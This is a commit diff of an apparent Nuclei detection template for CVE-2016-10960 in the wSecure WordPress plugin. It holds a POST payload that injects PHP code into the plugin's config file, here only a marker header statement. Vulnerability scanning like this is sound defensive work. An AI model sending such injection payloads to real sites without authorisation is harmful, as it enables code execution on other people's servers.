Update CVE-2016-10960.yaml

patch-1
Prince Chaddha 2021-07-16 17:54:37 +05:30 committed by GitHub
parent 429bb01311
commit eaba7dc5de
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 2 deletions

View File

@ -15,14 +15,15 @@ requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="'
body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
matchers-condition: and
matchers:
- type: word
words:
- "Hello, world CVE-2016-10960."
- "Nuclei: CVE-2016-10960"
condition: and
part: header
- type: status
status:
- 200